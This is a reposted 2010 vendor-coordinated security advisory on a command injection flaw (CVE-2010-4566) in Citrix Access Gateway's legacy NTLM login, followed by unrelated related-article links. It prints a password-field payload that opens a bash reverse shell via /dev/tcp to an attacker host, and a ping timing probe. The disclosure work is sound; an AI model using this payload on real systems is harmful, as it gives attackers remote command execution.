Citrix Access Gateway Command Injection Vulnerability

简介:

-----BEGIN PGP SIGNED MESSAGE----- 
Hash: SHA1


VSR Security Advisory 
http://www.vsecurity.com/

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: Citrix Access Gateway Command Injection Vulnerability 
Release Date: 2010-12-21 
Application: Citrix Access Gateway 
Versions: Access Gateway Enterprise Edition (up to 9.2-49.8) 
Access Gateway Standard & Advanced Edition (prior to 5.0) 
Severity: High 
Author: George D. Gal <ggal (at) vsecurity (dot) com> 
Vendor Status: Updated Software Released, NT4 Authentication Removed [2] 
CVE Candidate: CVE-2010-4566 
Reference: http://www.vsecurity.com/resources/advisory/20101221-1/

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description 
- ------------------- 
- From [1]:

"Citrix(R) Access Gateway(TM) is a secure application access solution that 
provides administrators granular application-level control while 
empowering users with remote access from anywhere. It gives IT 
administrators a single point to manage access control and limit actions 
within sessions based on both user identity and the endpoint device, 
providing better application security, data protection, and compliance 
management."

Vulnerability Overview 
- ----------------------

On August 2nd, VSR identified a vulnerability in Citrix Access Gateway within 
the way user authentication credentials are handled. Under certain 
configuration settings it appears that user credentials are passed as 
arguments to a command line program to authenticate the user. A lack of data 
validation and the mechanism in which the external program is spawned results 
in the potential for command injection and arbitrary command execution on the 
Access Gateway.

Vulnerability Details 
- ---------------------

The Citrix Access Gateway provides support for multiple authentication types. 
When utilizing the external legacy NTLM authentication module known as 
ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command 
line utility to verify a user's identity and password. By embedding shell 
metacharacters in the web authentication form it is possible to execute 
arbitrary commands on the Access Gateway.

The following commands are executed by the ntlm_authenticator during this 
process:

vpnadmin 10130 0.0 0.0 2104 976 ? S 15:02 0:00 sh -c /usr/local/samba/bin/samedit -c 'samuser username -a' -U <<username>>%<<password>> -p 139 -S xxx.xxx.xxx.xxx > /tmp/samedit-samuser-stdout.50474096 2> /dev/null

vpnadmin 10131 0.0 0.1 3852 1528 ? S 15:02 0:00 /usr/local/samba/bin/samedit -c samuser username -a -U <<username>>%XXXXXXXX -p 139 -S xxx.xxx.xxx.xxx

By submitting a password value as shown below, it is possible to establish a 
reverse shell to a netcat listener:

| bash -i >& /dev/tcp/<<HOST>>/<<PORT>> 0>&1 &

Using a simple ping command in the password field an attacker could use timing 
attacks to verify the presence of the vulnerability:

| ping -c 10 <<HOST>>

The ping command above will attempt to send 10 ICMP echo requests to the 
target host, resulting in a noticable delay easily detected by vulnerability 
scanners.

Versions Affected 
- ----------------- 
Testing was performed against a Citrix Access Gateway 2000 version 4.5.7. 
According to the vendor this vulnerability affects all versions of Access 
Gateway Enterprise Edition up to version 9.2-49.8, and all versions of 
the Access Gateway Standard and Advanced Editions prior to Access Gateway 
5.0.

Vendor Response 
- --------------- 
The following timeline details the vendor's response to the reported issue:

2010-08-06 Citrix was provided a draft advisory. 
2010-08-10 Citrix acknowledged receipt of draft advisory. 
2010-08-16 VSR follow-up to determine confirmation of issue. 
2010-08-16 Citrix confirmed issue. 
2010-09-14 VSR follow-up to determine status of issue. 
2010-09-29 VSR follow-up to determine status of issue. 
2010-09-30 Citrix confirmed continued investigation of the issue. 
2010-10-19 VSR follow-up to determine status of issue. 
2010-10-26 Citrix verified issue only exists in NT4 authentication feature. 
2010-12-01 VSR follow-up to determine status of issue. 
2010-12-02 Citrix confirmed December 14th release of security bulletin. 
2010-12-14 Citrix releases security bulletin. 
2010-12-20 CVE assigned 
2010-12-21 VSR releases advisory.


The Citrix advisory may be obtained at: 
http://support.citrix.com/article/CTX127613

Recommendation 
- -------------- 
Citrix has indicated that this vulnerability only affects legacy NT4 
authentication which has been removed from the latest release of the 
device firmware.

Common Vulnerabilities and Exposures (CVE) Information 
- ------------------------------------------------------ 
The Common Vulnerabilities and Exposures (CVE) project has assigned 
the number CVE-2010-4566 to this issue. This is a candidate for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.


Acknowledgements 
- ---------------- 
VSR would like to thank Citrix for the coordinated release of this advisory.

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. Citrix Access Gateway 
http://citrix.com/accessgateway/overview 
2. Citrix Access Gateway - Vendor Security Bulletin 
http://support.citrix.com/article/CTX127613

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

This advisory is distributed for educational purposes only with the sincere 
hope that it will help promote public safety. This advisory comes with 
absolutely NO WARRANTY; not even the implied warranty of merchantability or 
fitness for a particular purpose. Virtual Security Research, LLC nor the 
author accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information.

See the VSR disclosure policy for more information on our responsible 
disclosure practices:

http://www.vsecurity.com/company/disclosure

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
Copyright 2010 Virtual Security Research, LLC. All rights reserved.


-----BEGIN PGP SIGNATURE----- 
Version: GnuPG v1.4.8 (Darwin) 
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk0Q3L8ACgkQQ1RSUNR+T+idEwCeN2plOLk8rWQoPY4DqAolEY5V 
EbEAoJn38LPt3MEm3xvQaL6wWPbwDsUb 
=b3y+














本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/463393,如需转载请自行联系原作者

相关文章
|
11月前
|
安全 Java Linux
Omnissa Unified Access Gateway 2503 - 远程安全的应用程序访问
Omnissa Unified Access Gateway 2503 - 远程安全的应用程序访问
262 7
Omnissa Unified Access Gateway 2503 - 远程安全的应用程序访问
|
SQL
Symantec Web Gateway 'deptUploads_data.php' SQL Injection Vulnerability
http://www.securityfocus.com/bid/54721/exploit
626 0
|
安全 Shell 网络协议
Citrix Access Gateway Command Injection
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Advisory Name: ...
918 0
|
6月前
|
负载均衡 监控 Java
Spring Cloud Gateway 全解析:路由配置、断言规则与过滤器实战指南
本文详细介绍了 Spring Cloud Gateway 的核心功能与实践配置。首先讲解了网关模块的创建流程,包括依赖引入(gateway、nacos 服务发现、负载均衡)、端口与服务发现配置,以及路由规则的设置(需注意路径前缀重复与优先级 order)。接着深入解析路由断言,涵盖 After、Before、Path 等 12 种内置断言的参数、作用及配置示例,并说明了自定义断言的实现方法。随后重点阐述过滤器机制,区分路由过滤器(如 AddRequestHeader、RewritePath、RequestRateLimiter 等)与全局过滤器的作用范围与配置方式,提
Spring Cloud Gateway 全解析:路由配置、断言规则与过滤器实战指南
|
5月前
|
缓存 JSON NoSQL
别再手写过滤器!SpringCloud Gateway 内置30 个,少写 80% 重复代码
小富分享Spring Cloud Gateway内置30+过滤器,涵盖请求、响应、路径、安全等场景,无需重复造轮子。通过配置实现Header处理、限流、重试、熔断等功能,提升网关开发效率,避免代码冗余。
585 1
|
8月前
|
前端开发 Java API
Spring Cloud Gateway Server Web MVC报错“Unsupported transfer encoding: chunked”解决
本文解析了Spring Cloud Gateway中出现“Unsupported transfer encoding: chunked”错误的原因,指出该问题源于Feign依赖的HTTP客户端与服务端的`chunked`传输编码不兼容,并提供了具体的解决方案。通过规范Feign客户端接口的返回类型,可有效避免该异常,提升系统兼容性与稳定性。
583 0
|
9月前
|
缓存 监控 Java
说一说 SpringCloud Gateway 堆外内存溢出排查
我是小假 期待与你的下一次相遇 ~
1239 5
|
9月前
|
Java API Nacos
|
JSON Java API
利用Spring Cloud Gateway Predicate优化微服务路由策略
Spring Cloud Gateway 的路由配置中,`predicates`​(断言)用于定义哪些请求应该匹配特定的路由规则。 断言是Gateway在进行路由时,根据具体的请求信息如请求路径、请求方法、请求参数等进行匹配的规则。当一个请求的信息符合断言设置的条件时,Gateway就会将该请求路由到对应的服务上。
1356 69
利用Spring Cloud Gateway Predicate优化微服务路由策略
|
前端开发 Java Nacos
🛡️Spring Boot 3 整合 Spring Cloud Gateway 工程实践
本文介绍了如何使用Spring Cloud Alibaba 2023.0.0.0技术栈构建微服务网关,以应对微服务架构中流量治理与安全管控的复杂性。通过一个包含鉴权服务、文件服务和主服务的项目,详细讲解了网关的整合与功能开发。首先,通过统一路由配置,将所有请求集中到网关进行管理;其次,实现了限流防刷功能,防止恶意刷接口;最后,添加了登录鉴权机制,确保用户身份验证。整个过程结合Nacos注册中心,确保服务注册与配置管理的高效性。通过这些实践,帮助开发者更好地理解和应用微服务网关。
2232 0
🛡️Spring Boot 3 整合 Spring Cloud Gateway 工程实践